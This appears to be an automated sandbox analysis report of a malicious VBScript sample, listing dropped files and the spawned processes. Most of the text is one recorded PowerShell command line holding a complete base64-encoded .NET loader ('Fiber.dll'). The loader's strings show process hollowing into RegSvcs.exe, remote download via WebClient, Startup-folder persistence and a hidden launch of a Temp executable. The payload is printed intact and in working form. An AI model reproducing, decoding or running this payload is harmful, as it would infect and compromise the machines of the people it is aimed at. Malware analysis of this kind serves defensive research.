Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
GJ890-1286.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilbo13zy.j2f.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xv2hgkd3.00w.psm1
|
very short file (no magic)
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GJ890-1286.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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AQAAASkADAcBAAABKwBOBwEAAAEtAGAHAQAAAS8AgAQCAAABMQAiBwEAAAEzAIAAAQAEgAAAAQAAAAAAAAAAAAAAAADSBAAACgAAAAAAAAAAAAAAoQFbAAAAAAAEAAAAAAAAAAAAAACqATMEAAAAAAQAAAAAAAAAAAAAAKoBUgAAAAAAAAAAAAEAAAAcBgAADAAEAA0ABAAOAAgADwAIAAAAEAAaAFAAAAAQAEkAUAAAAAAASwBQACMAkgEjAJwBAAAAAABBYDEAQ29udGV4dFZhbHVlYDEAVG9JbnQzMgBUb0ludDE2AGdldF9VVEY4AEEAQgBDAEQARQBWQUkAUUJYdFgAUHJvamVjdERhdGEAZGF0YQBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWMAR2V0UHJvY2Vzc0J5SWQAUmVzdW1lVGhyZWFkAFN5bmNocm9uaXplZABSZXBsYWNlAENyZWF0ZUluc3RhbmNlAEFuZGUAR2V0SGFzaENvZGUAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUASG9tZQBWYWx1ZVR5cGUAQXBwbGljYXRpb25CYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAFN0clJldmVyc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAR3VpZEF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE9iZnVzY2F0aW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAWWFub0F0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAU3VwcHJlc3NVbm1hbmFnZWRDb2RlU2VjdXJpdHlBdHRyaWJ1dGUAQnl0ZQBnZXRfVmFsdWUAc2V0X1ZhbHVlAEdldE9iamVjdFZhbHVlAGdldF9TaXplAFNpemVPZgBOZXdMYXRlQmluZGluZwBzZXRfRW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE9wdGljYWwATWFyc2hhbABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwATGF0ZUNhbGwAa2VybmVsMzIuZGxsAG50ZGxsLmRsbABGaWJlci5kbGwAS2lsbABTeXN0ZW0AQm9vbGVhbgBWZXJzaW9uAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAEludGVyYWN0aW9uAE50VW5tYXBWaWV3T2ZTZWN0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBDdWx0dXJlSW5mbwBaZXJvAFN0YXJ0dXAAc3RhcnR1cABGaWJlcgBCdWZmZXIAUmVzb3VyY2VNYW5hZ2VyAFVzZXIAQml0Q29udmVydGVyAENvbXB1dGVyAENsZWFyUHJvamVjdEVycm9yAFNldFByb2plY3RFcnJvcgBBY3RpdmF0b3IALmN0b3IALmNjdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBGaWJlci5SZXNvdXJjZXMucmVzb3VyY2VzAEdldEJ5dGVzAFN0cmluZ3MAUmVmZXJlbmNlRXF1YWxzAFRvb2xzAENvbnZlcnNpb25zAFJ1bnRpbWVIZWxwZXJzAE9wZXJhdG9ycwBDcmVhdGVQcm9jZXNzAENvbmNhdABGb3JtYXQAQ3JlYXRlT2JqZWN0AENvbmNhdGVuYXRlT2JqZWN0AExhdGVHZXQAU3lzdGVtLk5ldABMYXRlU2V0AFdlYkNsaWVudABDb252ZXJ0AFN5c3RlbS5UZXh0AFdvdzY0R2V0VGhyZWFkQ29udGV4dABXb3c2NFNldFRocmVhZENvbnRleHQAVmlydHVhbEFsbG9jRXgAQXJyYXkAZ2V0X0Fzc2VtYmx5AEJsb2NrQ29weQBSZWFkUHJvY2Vzc01lbW9yeQBXcml0ZVByb2Nlc3NNZW1vcnkAU3lzdGVtLlNlY3VyaXR5AElzTnVsbE9yRW1wdHkAAAAAAB9GAGkAYgBlAHIALgBSAGUAcwBvAHUAcgBjAGUAcwAAc0MAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAUgBlAGcAUwB2AGMAcwAuAGUAeABlAAALIgB7ADAAfQAiAAADIAAACygA+AArACgAKgABA2IAAA19AJEl+gAoAH0AIQABA2MAAAu2JfgA/f99ADQAAQNkAAALKADAJbIlKgAeIgEDZQAAEUAAQAD9/5ElQAArAEAAwCUBA3gAABHdISoAQAAfJrIlKAAqAJMhAQNoAAAR/f8fBH0A/f8aIh4mACb4AAEDdAAACygA+gAeIigAXQABAzEAABH6ACoAQABAACgA+AD6ACgAAQMyAAARwCUrAJIhkyF9APAAHya2JQEDOgAAEbYlOgAjAB4mKgDPJSoANAABAy8AABtXAFMAYwByAGkAcAB0AC4AUwBoAGUAbABsAAABAB1TAHAAZQBjAGkAYQBsAEYAbwBsAGQAZQByAHMAAA9TAHQAYQByAHQAdQBwAAAdQwByAGUAYQB0AGUAUwBoAG8AcgB0AGMAdQB0AAAZXABuAG8AdABlAHAAYQBkAC4AbABuAGsAABlJAGMAbwBuAEwAbwBjAGEAdABpAG8AbgAAHW4AbwB0AGUAcABhAGQALgBlAHgAZQAsACAAMAAAFVQAYQByAGcAZQB0AFAAYQB0AGgAAHNDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAAIVcAbwByAGsAaQBuAGcARABpAHIAZQBjAHQAbwByAHkAABdXAGkAbgBkAG8AdwBTAHQAeQBsAGUAABNBAHIAZwB1AG0AZQBuAHQAcwAAgQ1DADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAA1ADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAARdEAGUAcwBjAHIAaQBwAHQAaQBvAG4AABNNAGkAYwByAG8AcwBvAGYAdAAACVMAYQB2AGUAAC+Eghx14LFDiFFzunjA1gEAAyAAAQUgAQEREQYVEjQBEgwGFRI0ARIIBhUSNAESGQYVEjQBEjAEIAATAAQAARwcBCABAhwDIAAIBgABEikRLQMgAA4CHgAFEAEAHgAGFRI1ARMABhUSNAETAAcGFRI1ARMAAhMABSABARMABQACAhwcBCAAEkEGIAIBDhJBBgABEkkSSQIGDgUAAg4OHAUAAQgSKQQAAQIOBgADDg4ODgIGGAYAAggdBQgDAAAIBgACBh0FCAoABQESdQgSdQgIBQABHQUIAh0FBQABARJhBQABElUIAwAAAQUAABKAhQYgAQESgIUEAAEOHAQAAQ4OBSACDg4OBCABDg4FAAEdBQ4FAAIcDg4QAAccHBIpDh0cHQ4dEikdAgUAAhwcHA4ABgEcEikOHRwdDh0SKQIdHBEACBwcEikOHRwdDh0SKR0CAgQgAQEIBCABAQ4EIAEBAgcgBAEODg4OBQcDAg4IIAcYAggOETwROAgIHQgICAgIAggIHQUICAgICAgdBRJVBQcCDhJhBQcDHBwcBAcBHgAECgEeAAQHARMABAoBEwAIsD9ffxHVCjoIt3pcVhk04IkQMQAuADAALgAxADUALgAwAAcGFRI0ARIMBwYVEjQBEggHBhUSNAESGQcGFRI0ARIwAwYSOQMGEj0DBhIYAgYJAgYIAgYGBAAAEgwEAAASCAQAABIZBAAAEjAEAAASOQQAABI9BQABARI9BAAAEhgRAAoCDg4YGAIJGA4QETwQETgGAAICGB0ICgAFAhgIEAgIEAgKAAUCGAgdBQgQCAUAAggYCAgABQgYCAgICAQAAQgYBQABAh0FCAAEAg4OHQUCBAABARwEIAASKQcQAQEeAB4ABzABAQEQHgAIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBBQEAAAAAKQEAJDc5MTcyQjEzLUVEQkEtNDA5Ni1CNzI1LThFOTJCNzMwQjJCQQAADAEABzEuMC4wLjAAAEkBABouTkVURnJhbWV3b3JrLFZlcnNpb249djQuOAEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUSLk5FVCBGcmFtZXdvcmsgNC44BAEAAAAIAQABAAAAAAAIAQACAAAAAABhAQA0U3lzdGVtLldlYi5TZXJ2aWNlcy5Qcm90b2NvbHMuU29hcEh0dHBDbGllbnRQcm90b2NvbBJDcmVhdGVfX0luc3RhbmNlX18TRGlzcG9zZV9fSW5zdGFuY2VfXwAAAB0BAAEAVAIVU3RyaXBBZnRlck9iZnVzY2F0aW9uALQAAADOyu++AQAAAJEAAABsU3lzdGVtLlJlc291cmNlcy5SZXNvdXJjZVJlYWRlciwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5I1N5c3RlbS5SZXNvdXJjZXMuUnVudGltZVJlc291cmNlU2V0AgAAAAAAAAAAAAAAUEFEUEFEULQAAACIRAAAAAAAAAAAAACiRAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlEQAAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhgAADMAgAAAAAAAAAAAADMAjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAELAIAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAACAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAACoAAQABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAANAAKAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABGAGkAYgBlAHIALgBkAGwAbAAAACYAAQABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAAAAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAADwACgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABGAGkAYgBlAHIALgBkAGwAbAAAACIAAQABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAADAAAALQ0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA